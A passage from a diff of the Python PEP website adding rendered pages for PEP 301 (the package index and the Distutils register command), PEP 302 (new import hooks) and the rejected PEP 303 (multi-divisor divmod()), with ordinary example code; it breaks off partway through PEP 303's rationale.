Accepts a POST submission of metadata about a package. The +“name” and “version” fields are mandatory, as they uniquely identify +an entry in the index. Submit will automatically determine +whether to create a new entry or update an existing entry. The +metadata is checked for correctness where appropriate - specifically +the Trove discriminators are compared with the allowed set. An +update will update all information about the package based on the +new submitted information.

There will also be a submit/edit form that will allow manual +submission and updating for those who do not use Distutils.

+
+
submit_pkg_info
Accepts a POST submission of a PKG-INFO file and performs the same +function as the submit interface.
+
user
Registers a new user with the index. Requires username, password +and email address. Passwords will be stored in the index database +as SHA hashes. If the username already exists in the database:
    +
  1. If valid HTTP Basic authentication is provided, the password and +email address are updated with the submission information, or
  2. +
  3. If no valid authentication is provided, the user is informed that +the login is already taken.
  4. +
+

Registration will be a three-step process, involving:

+
    +
  1. User submission of details via the Distutils register command +or through the web,
  2. +
  3. Index server sending email to the user’s email address with a URL +to visit to confirm registration with a random one-time key, and
  4. +
  5. User visits URL with the key and confirms registration.
  6. +
+
+
roles
An interface for changing user Role assignments.
+
password_reset
Using a supplied email address as the key, this resets a user’s +password and sends an email with the new password to the user.
+
+

The submit command will require HTTP Basic authentication, +preferably over an HTTPS connection.

+

The server interface will indicate success or failure of the commands +through a subset of the standard HTTP response codes:

+ + + + + + + + + + + + + + + + + + + + + + + + + +
CodeMeaningRegister command implications
200OKEverything worked just fine
400Bad requestData provided for submission was malformed
401UnauthorisedThe username or password supplied were incorrect
403ForbiddenUser does not have permission to update the +package information (not Owner or Maintainer)
+
+
+

User Roles

+

Three user Roles will be assignable to users:

+
+
Owner
Owns a package name, may assign Maintainer Role for that name. The +first user to register information about a package is deemed Owner +of the package name. The Admin user may change this if necessary. +May submit updates for the package name.
+
Maintainer
Can submit and update info for a particular package name.
+
Admin
Can assign Owner Role and edit user details. Not specific to a +package name.
+
+
+
+

Index Storage (Schema)

+

The index is stored in a set of relational database tables:

+
+
packages
Lists package names and holds package-level metadata (currently +just the stable release version)
+
releases
Each package has an entry in releases for each version of the +package that is released. A row holds the bulk of the information +given in the package’s PKG-INFO file. There is one row for each +package (name, version).
+
trove_discriminators
Lists the Trove discriminator text and assigns each one a unique +ID.
+
release_discriminators
Each entry maps a package (name, version) to a +discriminator_id. We map to releases instead of packages because +the set of discriminators may change between releases.
+
journals
Holds information about changes to package information in the +index. Changes to the packages, releases, roles, +and release_discriminators tables are listed here by +package name and version if the change is release-specific.
+
users
Holds our user database - user name, email address and password.
+
roles
Maps user_name and role_name to a package_name.
+
+

An additional table, rego_otk, holds the One Time Keys generated during registration and is not interesting in the scope of the index itself.

+
+
+

Distutils register Command

+

An additional Distutils command, register, is implemented which +posts the package metadata to the central index. The register +command automatically handles user registration; the user is presented +with three options:

+
    +
  1. login and submit package information
  2. +
  3. register as a new packager
  4. +
  5. send password reminder email
  6. +
+

On systems where the $HOME environment variable is set, the user will be prompted at exit to save their username/password to the file .pypirc in their $HOME directory.

+

Notification of changes to a package entry will be sent to all users +who have submitted information about the package. That is, the +original submitter and any subsequent updaters.

+

The register command will include a --verify option which +performs a test submission to the index without actually committing +the data. The index will perform its submission verification checks +as usual and report any errors it would have reported during a normal +submission. This is useful for verifying correctness of Trove +discriminators.

+
+
+

Distutils Trove Classification

+

The Trove concept of discrimination will be added to the metadata +set available to package authors through the new attribute +“classifiers”. The list of classifiers will be available through the +web, and added to the package like so:

+
setup(
+    name = "roundup",
+    version = __version__,
+    classifiers = [
+        'Development Status :: 4 - Beta',
+        'Environment :: Console',
+        'Environment :: Web Environment',
+        'Intended Audience :: End Users/Desktop',
+        'Intended Audience :: Developers',
+        'Intended Audience :: System Administrators',
+        'License :: OSI Approved :: Python Software Foundation License',
+        'Operating System :: MacOS :: MacOS X',
+        'Operating System :: Microsoft :: Windows',
+        'Operating System :: POSIX',
+        'Programming Language :: Python',
+        'Topic :: Communications :: Email',
+        'Topic :: Office/Business',
+        'Topic :: Software Development :: Bug Tracking',
+    ],
+    url = 'http://sourceforge.net/projects/roundup/',
+    ...
+)
+
+
+

It was decided that strings would be used for the classification +entries due to the deep nesting that would be involved in a more +formal Python structure.

+

The original Trove specification, which called for classification namespaces to be separated by slashes (“/”), unfortunately collides with many of the names having slashes in them (e.g. “OS/2”). The double-colon solution (” :: “) implemented by SourceForge and FreshMeat gets around this limitation.

+

The list of classification values on the module index has been merged +from FreshMeat and SourceForge (with their permission). This list +will be made available both through the web interface and through the +register command’s --list-classifiers option as a text list +which may then be copied to the setup.py file. The register +command’s --verify option will check classifiers values against +the server’s list.

+
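Assuming the command is integrated as described, typical invocations might look like this (a hypothetical session):

python setup.py register                      # submit metadata to the index
python setup.py register --verify             # dry-run the submission checks
python setup.py register --list-classifiers   # fetch the valid classifiers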

Unfortunately, the addition of the “classifiers” property is not +backwards-compatible. A setup.py file using it will not work under +Python 2.1.3. It is hoped that a bug-fix release of Python 2.2 (most +likely 2.2.3) will relax the argument checking of the setup() command +to allow new keywords, even if they’re not actually used. It is +preferable that a warning be produced, rather than a show-stopping +error. The use of the new keyword should be discouraged in situations +where the package is advertised as being compatible with python +versions earlier than 2.2.3 or 2.3.

+

In the PKG-INFO, the classifiers list items will appear as individual +Classifier: entries:

+
Name: roundup
+Version: 0.5.2
+Classifier: Development Status :: 4 - Beta
+Classifier: Environment :: Console (Text Based)
+            .
+            .
+Classifier: Topic :: Software Development :: Bug Tracking
+Url: http://sourceforge.net/projects/roundup/
+
+
+
+
+
+

Implementation

+

The server is available at:

+
+
+

The code is available from the SourceForge project:

+
+
+

The register command has been integrated into Python 2.3.

+
+
+

Rejected Proposals

+

Originally, the index server was to return custom headers (inspired by +PEP 243):

+
+
X-Pypi-Status
Either “success” or “fail”.
+
X-Pypi-Reason
A description of the reason for failure, or additional information +in the case of a success.
+
+

However, it has been pointed out [6] that this is a bad scheme to +use.

+
+
+

References

+ +
+ +
+

Acknowledgements

+

Anthony Baxter, Martin v. Loewis and David Goodger for encouragement +and feedback during initial drafting.

+

A.M. Kuchling for support including hosting the second prototype.

+

Greg Stein for recommending that the register command interpret the +HTTP response codes rather than custom X-PyPI-* headers.

+

The many participants of the Distutils and Catalog SIGs for their +ideas over the years.

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0301.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0302/index.html b/pep-0302/index.html new file mode 100644 index 00000000000..5b9388d3faa --- /dev/null +++ b/pep-0302/index.html @@ -0,0 +1,644 @@ + + + + + + + + PEP 302 – New Import Hooks | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 302 – New Import Hooks

+
+
Author:
+
Just van Rossum <just at letterror.com>, +Paul Moore <p.f.moore at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
19-Dec-2002
+
Python-Version:
+
2.3
+
Post-History:
+
19-Dec-2002
+
+
+
+
Table of Contents +
+
+

Warning

+

The language reference for import [10] and the importlib documentation [11] now supersede this PEP. This document is no longer updated and is provided for historical purposes only.

+
+
+

Abstract

+

This PEP proposes to add a new set of import hooks that offer better +customization of the Python import mechanism. Contrary to the current +__import__ hook, a new-style hook can be injected into the existing +scheme, allowing for a finer grained control of how modules are found and how +they are loaded.

+
+
+

Motivation

+

The only way to customize the import mechanism is currently to override the +built-in __import__ function. However, overriding __import__ has many +problems. To begin with:

+
    +
  • An __import__ replacement needs to fully reimplement the entire +import mechanism, or call the original __import__ before or after the +custom code.
  • +
  • It has very complex semantics and responsibilities.
  • +
  • __import__ gets called even for modules that are already in +sys.modules, which is almost never what you want, unless you’re writing +some sort of monitoring tool.
  • +
+

The situation gets worse when you need to extend the import mechanism from C: +it’s currently impossible, apart from hacking Python’s import.c or +reimplementing much of import.c from scratch.

+

There is a fairly long history of tools written in Python that allow extending the import mechanism in various ways, based on the __import__ hook. The Standard Library includes two such tools: ihooks.py (by GvR) and imputil.py [1] (Greg Stein), but perhaps the most famous is iu.py by Gordon McMillan, available as part of his Installer package. Their usefulness is somewhat limited because they are written in Python; bootstrapping issues need to be worked around as you can’t load the module containing the hook with the hook itself. So if you want the entire Standard Library to be loadable from an import hook, the hook must be written in C.

+
+
+

Use cases

+

This section lists several existing applications that depend on import hooks. +Among these, a lot of duplicate work was done that could have been saved if +there had been a more flexible import hook at the time. This PEP should make +life a lot easier for similar projects in the future.

+

Extending the import mechanism is needed when you want to load modules that +are stored in a non-standard way. Examples include modules that are bundled +together in an archive; byte code that is not stored in a pyc formatted +file; modules that are loaded from a database over a network.

+

The work on this PEP was partly triggered by the implementation of PEP 273, which adds imports from Zip archives as a built-in feature to Python. While the PEP itself was widely accepted as a must-have feature, the implementation left a few things to be desired. For one thing, it went to great lengths to integrate itself with import.c, adding lots of code that was either specific to Zip file imports, or not specific to Zip imports yet not generally useful (or even desirable) either. Yet the PEP 273 implementation can hardly be blamed for this: it is simply extremely hard to do, given the current state of import.c.

+

Packaging applications for end users is a typical use case for import hooks, +if not the typical use case. Distributing lots of source or pyc files +around is not always appropriate (let alone a separate Python installation), +so there is a frequent desire to package all needed modules in a single file. +So frequent in fact that multiple solutions have been implemented over the +years.

+

The oldest one is included with the Python source code: Freeze [2]. It puts +marshalled byte code into static objects in C source code. Freeze’s “import +hook” is hard wired into import.c, and has a couple of issues. Later +solutions include Fredrik Lundh’s Squeeze, Gordon McMillan’s Installer, and +Thomas Heller’s py2exe [3]. MacPython ships with a tool called +BuildApplication.

+

Squeeze, Installer and py2exe use an __import__ based scheme (py2exe currently uses Installer’s iu.py, Squeeze used ihooks.py), MacPython has two Mac-specific import hooks hard wired into import.c, that are similar to the Freeze hook. The hooks proposed in this PEP enable us (at least in theory; it’s not a short-term goal) to get rid of the hard-coded hooks in import.c, and would allow the __import__-based tools to get rid of most of their import.c emulation code.

+

Before work on the design and implementation of this PEP was started, a new +BuildApplication-like tool for Mac OS X prompted one of the authors of +this PEP (JvR) to expose the table of frozen modules to Python, in the imp +module. The main reason was to be able to use the freeze import hook +(avoiding fancy __import__ support), yet to also be able to supply a set +of modules at runtime. This resulted in issue #642578 [4], which was +mysteriously accepted (mostly because nobody seemed to care either way ;-). +Yet it is completely superfluous when this PEP gets accepted, as it offers a +much nicer and general way to do the same thing.

+
+
+

Rationale

+

While experimenting with alternative implementation ideas to get built-in Zip +import, it was discovered that achieving this is possible with only a fairly +small amount of changes to import.c. This allowed to factor out the +Zip-specific stuff into a new source file, while at the same time creating a +general new import hook scheme: the one you’re reading about now.

+

An earlier design allowed non-string objects on sys.path. Such an object +would have the necessary methods to handle an import. This has two +disadvantages: 1) it breaks code that assumes all items on sys.path are +strings; 2) it is not compatible with the PYTHONPATH environment variable. +The latter is directly needed for Zip imports. A compromise came from Jython: +allow string subclasses on sys.path, which would then act as importer +objects. This avoids some breakage, and seems to work well for Jython (where +it is used to load modules from .jar files), but it was perceived as an +“ugly hack”.

+

This led to a more elaborate scheme (mostly copied from McMillan’s iu.py) in which each candidate in a list is asked whether it can handle the sys.path item, until one is found that can. This list of candidates is a new object in the sys module: sys.path_hooks.

+

Traversing sys.path_hooks for each path item for each new import can be +expensive, so the results are cached in another new object in the sys +module: sys.path_importer_cache. It maps sys.path entries to importer +objects.

+

To minimize the impact on import.c as well as to avoid adding extra +overhead, it was chosen to not add an explicit hook and importer object for +the existing file system import logic (as iu.py has), but to simply fall +back to the built-in logic if no hook on sys.path_hooks could handle the +path item. If this is the case, a None value is stored in +sys.path_importer_cache, again to avoid repeated lookups. (Later we can +go further and add a real importer object for the built-in mechanism, for now, +the None fallback scheme should suffice.)

+

A question was raised: what about importers that don’t need any entry on +sys.path? (Built-in and frozen modules fall into that category.) Again, +Gordon McMillan to the rescue: iu.py contains a thing he calls the +metapath. In this PEP’s implementation, it’s a list of importer objects +that is traversed before sys.path. This list is yet another new object +in the sys module: sys.meta_path. Currently, this list is empty by +default, and frozen and built-in module imports are done after traversing +sys.meta_path, but still before sys.path.

+
+
+

Specification part 1: The Importer Protocol

This PEP introduces a new protocol: the “Importer Protocol”. It is important
to understand the context in which the protocol operates, so here is a brief
overview of the outer shells of the import mechanism.

When an import statement is encountered, the interpreter looks up the
__import__ function in the built-in name space. __import__ is then
called with four arguments, amongst which are the name of the module being
imported (may be a dotted name) and a reference to the current global
namespace.

The built-in __import__ function (known as PyImport_ImportModuleEx()
in import.c) will then check to see whether the module doing the import is
a package or a submodule of a package. If it is indeed a (submodule of a)
package, it first tries to do the import relative to the package (the parent
package for a submodule). For example, if a package named “spam” does “import
eggs”, it will first look for a module named “spam.eggs”. If that fails, the
import continues as an absolute import: it will look for a module named
“eggs”. Dotted name imports work pretty much the same: if package “spam” does
“import eggs.bacon” (and “spam.eggs” exists and is itself a package),
“spam.eggs.bacon” is tried. If that fails “eggs.bacon” is tried. (There are
more subtleties that are not described here, but these are not relevant for
implementers of the Importer Protocol.)

Deeper down in the mechanism, a dotted name import is split up by its
components. For “import spam.ham”, first an “import spam” is done, and only
when that succeeds is “ham” imported as a submodule of “spam”.

The Importer Protocol operates at this level of individual imports. By the
time an importer gets a request for “spam.ham”, module “spam” has already been
imported.

The protocol involves two objects: a finder and a loader. A finder object
has a single method:

finder.find_module(fullname, path=None)

This method will be called with the fully qualified name of the module. If
the finder is installed on sys.meta_path, it will receive a second
argument, which is None for a top-level module, or package.__path__
for submodules or subpackages [5]. It should return a loader object if the
module was found, or None if it wasn’t. If find_module() raises an
exception, it will be propagated to the caller, aborting the import.

A loader object also has one method:

loader.load_module(fullname)

This method returns the loaded module or raises an exception, preferably
ImportError if an existing exception is not being propagated. If
load_module() is asked to load a module that it cannot, ImportError is
to be raised.

In many cases the finder and loader can be one and the same object:
finder.find_module() would just return self.

The fullname argument of both methods is the fully qualified module name,
for example “spam.eggs.ham”. As explained above, when
finder.find_module("spam.eggs.ham") is called, “spam.eggs” has already
been imported and added to sys.modules. However, the find_module()
method isn’t necessarily always called during an actual import: meta tools
that analyze import dependencies (such as freeze, Installer or py2exe) don’t
actually load modules, so a finder shouldn’t depend on the parent package
being available in sys.modules.

The load_module() method has a few responsibilities that it must fulfill
before it runs any code:

  • If there is an existing module object named ‘fullname’ in sys.modules,
    the loader must use that existing module. (Otherwise, the reload()
    builtin will not work correctly.) If a module named ‘fullname’ does not
    exist in sys.modules, the loader must create a new module object and
    add it to sys.modules.

    Note that the module object must be in sys.modules before the loader
    executes the module code. This is crucial because the module code may
    (directly or indirectly) import itself; adding it to sys.modules
    beforehand prevents unbounded recursion in the worst case and multiple
    loading in the best.

    If the load fails, the loader needs to remove any module it may have
    inserted into sys.modules. If the module was already in sys.modules
    then the loader should leave it alone.

  • The __file__ attribute must be set. This must be a string, but it may
    be a dummy value, for example “<frozen>”. The privilege of not having a
    __file__ attribute at all is reserved for built-in modules.

  • The __name__ attribute must be set. If one uses imp.new_module()
    then the attribute is set automatically.

  • If it’s a package, the __path__ variable must be set. This must be a
    list, but may be empty if __path__ has no further significance to the
    importer (more on this later).

  • The __loader__ attribute must be set to the loader object. This is
    mostly for introspection and reloading, but can be used for
    importer-specific extras, for example getting data associated with an
    importer.

  • The __package__ attribute must be set (PEP 366).

If the module is a Python module (as opposed to a built-in module or a
dynamically loaded extension), it should execute the module’s code in the
module’s global name space (module.__dict__).

Here is a minimal pattern for a load_module() method:

# Consider using importlib.util.module_for_loader() to handle
# most of these details for you.
def load_module(self, fullname):
    code = self.get_code(fullname)
    ispkg = self.is_package(fullname)
    mod = sys.modules.setdefault(fullname, imp.new_module(fullname))
    mod.__file__ = "<%s>" % self.__class__.__name__
    mod.__loader__ = self
    if ispkg:
        mod.__path__ = []
        mod.__package__ = fullname
    else:
        mod.__package__ = fullname.rpartition('.')[0]
    exec(code, mod.__dict__)
    return mod
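To make both halves of the protocol concrete, here is an illustrative sketch
of a combined finder/loader. The class name DictImporter and the idea of
serving modules from an in-memory mapping of names to source strings are
invented for this example; they are not part of the protocol:

import imp
import sys

class DictImporter(object):
    # Finder and loader in one object: find_module() returns self.
    def __init__(self, sources):
        self.sources = sources  # maps fullname -> source code string

    def find_module(self, fullname, path=None):
        if fullname in self.sources:
            return self  # we act as our own loader
        return None      # let other importers have a go

    def load_module(self, fullname):
        if fullname not in self.sources:
            raise ImportError(fullname)
        code = compile(self.sources[fullname], "<%s>" % fullname, "exec")
        # Reuse an existing module object if present (reload() support).
        mod = sys.modules.setdefault(fullname, imp.new_module(fullname))
        mod.__file__ = "<%s>" % fullname
        mod.__loader__ = self
        mod.__package__ = fullname.rpartition('.')[0]
        exec(code, mod.__dict__)
        return mod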

Specification part 2: Registering Hooks

There are two types of import hooks: Meta hooks and Path hooks. Meta
hooks are called at the start of import processing, before any other import
processing (so that meta hooks can override sys.path processing, frozen
modules, or even built-in modules). To register a meta hook, simply add the
finder object to sys.meta_path (the list of registered meta hooks).

Path hooks are called as part of sys.path (or package.__path__)
processing, at the point where their associated path item is encountered. A
path hook is registered by adding an importer factory to sys.path_hooks.

sys.path_hooks is a list of callables, which will be checked in sequence
to determine if they can handle a given path item. The callable is called
with one argument, the path item. The callable must raise ImportError if
it is unable to handle the path item, and return an importer object if it can
handle the path item. Note that if the callable returns an importer object
for a specific sys.path entry, the builtin import machinery will not be
invoked to handle that entry any longer, even if the importer object later
fails to find a specific module. The callable is typically the class of the
import hook, and hence the class __init__() method is called. (This is
also the reason why it should raise ImportError: an __init__() method
can’t return anything. This would be possible with a __new__() method in
a new style class, but we don’t want to require anything about how a hook is
implemented.)

The results of path hook checks are cached in sys.path_importer_cache,
which is a dictionary mapping path entries to importer objects. The cache is
checked before sys.path_hooks is scanned. If it is necessary to force a
rescan of sys.path_hooks, it is possible to manually clear all or part of
sys.path_importer_cache.
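As an illustration of both registration styles, again using the hypothetical
DictImporter sketched earlier (the "<dict-importer>" path cookie is likewise
made up for the example):

import sys

# Meta hook: consulted before frozen, built-in and sys.path imports.
sys.meta_path.append(DictImporter({"spam": "x = 42\n"}))

# Path hook: claims only the one made-up path item, raising
# ImportError for everything else.
def dict_importer_hook(path_item):
    if path_item != "<dict-importer>":
        raise ImportError("not handled: %r" % (path_item,))
    return DictImporter({"eggs": "y = 1\n"})

sys.path_hooks.append(dict_importer_hook)
sys.path.append("<dict-importer>")

# Hook results are cached; clearing the cache forces a re-scan.
sys.path_importer_cache.clear()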

Just like sys.path itself, the new sys variables must have specific
types:

  • sys.meta_path and sys.path_hooks must be Python lists.
  • sys.path_importer_cache must be a Python dict.

Modifying these variables in place is allowed, as is replacing them with new
objects.

Packages and the role of __path__

If a module has a __path__ attribute, the import mechanism will treat it
as a package. The __path__ variable is used instead of sys.path when
importing submodules of the package. The rules for sys.path therefore
also apply to pkg.__path__. So sys.path_hooks is also consulted when
pkg.__path__ is traversed. Meta importers don’t necessarily use
sys.path at all to do their work and may therefore ignore the value of
pkg.__path__. In this case it is still advised to set it to a list, which
may be empty.

Optional Extensions to the Importer Protocol

The Importer Protocol defines three optional extensions. One is to retrieve
data files, the second is to support module packaging tools and/or tools that
analyze module dependencies (for example Freeze), while the last is to support
execution of modules as scripts. The latter two categories of tools usually
don’t actually load modules; they only need to know if and where they are
available. All three extensions are highly recommended for general purpose
importers, but may safely be left out if those features aren’t needed.

To retrieve the data for arbitrary “files” from the underlying storage
backend, loader objects may supply a method named get_data():

loader.get_data(path)

This method returns the data as a string, or raises IOError if the “file”
wasn’t found. The data is always returned as if “binary” mode was used -
there is no CRLF translation of text files, for example. It is meant for
importers that have some file-system-like properties. The ‘path’ argument is
a path that can be constructed by munging module.__file__ (or
pkg.__path__ items) with the os.path.* functions, for example:

d = os.path.dirname(__file__)
data = __loader__.get_data(os.path.join(d, "logo.gif"))

The following set of methods may be implemented if support for (for example)
Freeze-like tools is desirable. It consists of three additional methods
which, to make it easier for the caller, should either all be implemented,
or none at all:

loader.is_package(fullname)
loader.get_code(fullname)
loader.get_source(fullname)

All three methods should raise ImportError if the module wasn’t found.

The loader.is_package(fullname) method should return True if the
module specified by ‘fullname’ is a package and False if it isn’t.

The loader.get_code(fullname) method should return the code object
associated with the module, or None if it’s a built-in or extension
module. If the loader doesn’t have the code object but it does have the
source code, it should return the compiled source code. (This is so that our
caller doesn’t also need to check get_source() if all it needs is the code
object.)

The loader.get_source(fullname) method should return the source code for
the module as a string (using newline characters for line endings) or None
if the source is not available (yet it should still raise ImportError if
the module can’t be found by the importer at all).
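Continuing the hypothetical DictImporter sketch from earlier, the three
methods might be implemented together like this (illustrative only; this toy
importer stores only plain source modules):

def is_package(self, fullname):
    if fullname not in self.sources:
        raise ImportError(fullname)
    return False  # no packages in this toy importer

def get_source(self, fullname):
    if fullname not in self.sources:
        raise ImportError(fullname)
    return self.sources[fullname]

def get_code(self, fullname):
    # No pre-compiled code objects are stored, so compile the source.
    return compile(self.get_source(fullname), "<%s>" % fullname, "exec")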

To support execution of modules as scripts (PEP 338), the above three methods
for finding the code associated with a module must be implemented. In
addition to those methods, the following method may be provided in order to
allow the runpy module to correctly set the __file__ attribute:

loader.get_filename(fullname)

This method should return the value that __file__ would be set to if the
named module was loaded. If the module is not found, then ImportError
should be raised.

Integration with the ‘imp’ module

The new import hooks are not easily integrated in the existing
imp.find_module() and imp.load_module() calls. It’s questionable
whether it’s possible at all without breaking code; it is better to simply add
a new function to the imp module. The meaning of the existing
imp.find_module() and imp.load_module() calls changes from: “they
expose the built-in import mechanism” to “they expose the basic unhooked
built-in import mechanism”. They simply won’t invoke any import hooks. A new
imp module function is proposed (but not yet implemented) under the name
get_loader(), which is used as in the following pattern:

loader = imp.get_loader(fullname, path)
if loader is not None:
    loader.load_module(fullname)

In the case of a “basic” import, one that the imp.find_module() function
would handle, the loader object would be a wrapper for the current output of
imp.find_module(), and loader.load_module() would call
imp.load_module() with that output.

Note that this wrapper is currently not yet implemented, although a Python
prototype exists in the test_importhooks.py script (the ImpWrapper
class) included with the patch.
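For illustration only, a rough pure-Python approximation of what
get_loader() would have to do; this is not the actual implementation (which
did not exist when this PEP was written), and the built-in fallback wrapper
described above is elided:

import sys

def get_loader(fullname, path=None):
    # Meta hooks run first, before any sys.path processing.
    for finder in sys.meta_path:
        loader = finder.find_module(fullname, path)
        if loader is not None:
            return loader
    # Each path item maps to an importer via the hooks, with the result
    # cached (None meaning "fall back to the built-in logic").
    for item in (path if path is not None else sys.path):
        if item in sys.path_importer_cache:
            importer = sys.path_importer_cache[item]
        else:
            importer = None
            for hook in sys.path_hooks:
                try:
                    importer = hook(item)
                    break
                except ImportError:
                    pass
            sys.path_importer_cache[item] = importer
        if importer is not None:
            loader = importer.find_module(fullname)
            if loader is not None:
                return loader
    return None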

Forward Compatibility

Existing __import__ hooks will not invoke new-style hooks by magic, unless
they call the original __import__ function as a fallback. For example,
ihooks.py, iu.py and imputil.py are in this sense not forward
compatible with this PEP.

Open Issues

Modules often need supporting data files to do their job, particularly in the
case of complex packages or full applications. Current practice is generally
to locate such files via sys.path (or a package.__path__ attribute).
This approach will not work, in general, for modules loaded via an import
hook.

There are a number of possible ways to address this problem:

  • “Don’t do that”. If a package needs to locate data files via its
    __path__, it is not suitable for loading via an import hook. The
    package can still be located on a directory in sys.path, as at present,
    so this should not be seen as a major issue.

  • Locate data files from a standard location, rather than relative to the
    module file. A relatively simple approach (which is supported by
    distutils) would be to locate data files based on sys.prefix (or
    sys.exec_prefix). For example, looking in
    os.path.join(sys.prefix, "data", package_name).

  • Import hooks could offer a standard way of getting at data files relative
    to the module file. The standard zipimport object provides a method
    get_data(name) which returns the content of the “file” called name,
    as a string. To allow modules to get at the importer object, zipimport
    also adds an attribute __loader__ to the module, containing the
    zipimport object used to load the module. If such an approach is used,
    it is important that client code takes care not to break if the
    get_data() method is not available, so it is not clear that this
    approach offers a general answer to the problem.

It was suggested on python-dev that it would be useful to be able to receive a
list of available modules from an importer and/or a list of available data
files for use with the get_data() method. The protocol could grow two
additional extensions, say list_modules() and list_files(). The
latter makes sense on loader objects with a get_data() method. However,
it’s a bit unclear which object should implement list_modules(): the
importer or the loader or both?

This PEP is biased towards loading modules from alternative places: it
currently doesn’t offer dedicated solutions for loading modules from
alternative file formats or with alternative compilers. In contrast, the
ihooks module from the standard library does have a fairly straightforward
way to do this. The Quixote project [7] uses this technique to import PTL
files as if they are ordinary Python modules. To do the same with the new
hooks would mean either adding a new module implementing a subset of
ihooks as a new-style importer, or adding a hookable built-in path importer
object.

There is no specific support within this PEP for “stacking” hooks. For
example, it is not obvious how to write a hook to load modules from tar.gz
files by combining separate hooks to load modules from .tar and .gz
files. However, there is no support for such stacking in the existing hook
mechanisms (either the basic “replace __import__” method, or any of the
existing import hook modules) and so this functionality is not an obvious
requirement of the new mechanism. It may be worth considering as a future
enhancement, however.

It is possible (via sys.meta_path) to add hooks which run before
sys.path is processed. However, there is no equivalent way of adding
hooks to run after sys.path is processed. For now, if a hook is required
after sys.path has been processed, it can be simulated by adding an
arbitrary “cookie” string at the end of sys.path, and having the required
hook associated with this cookie, via the normal sys.path_hooks
processing. In the longer term, the path handling code will become a “real”
hook on sys.meta_path, and at that stage it will be possible to insert
user-defined hooks either before or after it.

Implementation

The PEP 302 implementation has been integrated with Python as of 2.3a1. An
earlier version is available as patch #652586 [9], but more interestingly,
the issue contains a fairly detailed history of the development and design.

PEP 273 has been implemented using PEP 302’s import hooks.

References and Footnotes

Source: https://github.com/python/peps/blob/main/peps/pep-0302.rst

Last modified: 2023-09-09 17:39:29 GMT

diff --git a/pep-0303/index.html b/pep-0303/index.html
PEP 303 – Extend divmod() for Multiple Divisors

Author: Thomas Bellman <bellman+pep-divmod at lysator.liu.se>
Status: Rejected
Type: Standards Track
Created: 31-Dec-2002
Python-Version: 2.3
Post-History:

Abstract

This PEP describes an extension to the built-in divmod() function,
allowing it to take multiple divisors, chaining several calls to
divmod() into one.

Pronouncement

This PEP is rejected. Most uses for chained divmod() involve a
constant modulus (in radix conversions for example) and are more
properly coded as a loop. The example of splitting seconds
into days/hours/minutes/seconds does not generalize to months
and years; rather, the whole use case is handled more flexibly and
robustly by date and time modules. The other use cases mentioned
in the PEP are somewhat rare in real code. The proposal is also
problematic in terms of clarity and obviousness. In the examples,
it is not immediately clear that the argument order is correct or
that the target tuple is of the right length. Users from other
languages are more likely to understand the standard two argument
form without having to re-read the documentation. See python-dev
discussion on 17 June 2005 [1].

Specification

The built-in divmod() function would be changed to accept multiple
divisors, changing its signature from divmod(dividend, divisor) to
divmod(dividend, *divisors). The dividend is divided by the last
divisor, giving a quotient and a remainder. The quotient is then
divided by the second to last divisor, giving a new quotient and
remainder. This is repeated until all divisors have been used,
and divmod() then returns a tuple consisting of the quotient from
the last step, and the remainders from all the steps.

A Python implementation of the new divmod() behaviour could look
like:

def divmod(dividend, *divisors):
    modulos = ()
    q = dividend
    while divisors:
        q, r = q.__divmod__(divisors[-1])
        modulos = (r,) + modulos
        divisors = divisors[:-1]
    return (q,) + modulos
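For example, once the definition above is in effect (shadowing the builtin),
one million seconds split into weeks, days, hours, minutes and seconds:

print(divmod(1000000, 7, 24, 60, 60))  # -> (1, 4, 13, 46, 40)
print(divmod(1000000))                 # no divisors: (1000000,)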

Motivation

Occasionally one wants to perform a chain of divmod() operations,
calling divmod() on the quotient from the previous step, with
varying divisors. The most common case is probably converting a
number of seconds into weeks, days, hours, minutes and seconds.
This would today be written as:

def secs_to_wdhms(seconds):
    m, s = divmod(seconds, 60)
    h, m = divmod(m, 60)
    d, h = divmod(h, 24)
    w, d = divmod(d, 7)
    return (w, d, h, m, s)

This is tedious and easy to get wrong each time you need it.

If instead the divmod() built-in is changed according to the proposal,
the code for converting seconds to weeks, days, hours, minutes and
seconds then becomes:

def secs_to_wdhms(seconds):
    w, d, h, m, s = divmod(seconds, 7, 24, 60, 60)
    return (w, d, h, m, s)

which is easier to type, easier to type correctly, and easier to
read.

Other applications are:

  • Astronomical angles (declination is measured in degrees, minutes
    and seconds, right ascension is measured in hours, minutes and
    seconds).
  • Old British currency (1 pound = 20 shilling, 1 shilling = 12 pence).
  • Anglo-Saxon length units: 1 mile = 1760 yards, 1 yard = 3 feet,
    1 foot = 12 inches.
  • Anglo-Saxon weight units: 1 long ton = 160 stone, 1 stone = 14
    pounds, 1 pound = 16 ounce, 1 ounce = 16 dram.
  • British volumes: 1 gallon = 4 quart, 1 quart = 2 pint, 1 pint
    = 20 fluid ounces.
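For instance, the old British currency case would read as follows
(hypothetical code, assuming the extended divmod() from this PEP):

# 2500 old pence expressed as pounds, shillings and pence.
pounds, shillings, pence = divmod(2500, 20, 12)
print((pounds, shillings, pence))  # -> (10, 8, 4)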

Rationale

The idea comes from APL, which has an operator that does this. (I
don’t remember what the operator looks like, and it would probably
be impossible to render in ASCII anyway.)

The APL operator takes a list as its second operand, while this
PEP proposes that each divisor should be a separate argument to
the divmod() function. This is mainly because it is expected that
the most common uses will have the divisors as constants right in
the call (as the 7, 24, 60, 60 above), and adding a set of
parentheses or brackets would just clutter the call.

Requiring an explicit sequence as the second argument to divmod()
would seriously break backwards compatibility. Making divmod()
check its second argument for being a sequence is deemed to be too
ugly to contemplate. And in the case where one does have a
sequence that is computed elsewhere, it is easy enough to write
divmod(x, *divs) instead.

Requiring at least one divisor, i.e. rejecting divmod(x), has been
considered, but no good reason to do so has come to mind, so calling
divmod() with a single argument is allowed in the name of generality.

Calling divmod() with no divisors should still return a tuple (of
one element). Code that calls divmod() with a varying number of
divisors, and thus gets a return value with an “unknown” number of
elements, would otherwise have to special case that case. Code
that knows it is calling divmod() with no divisors is considered
to be too silly to warrant a special case.

Processing the divisors in the other direction, i.e. dividing with
the first divisor first, instead of dividing with the last divisor
first, has been considered. However, the result comes with the
most significant part first and the least significant part last
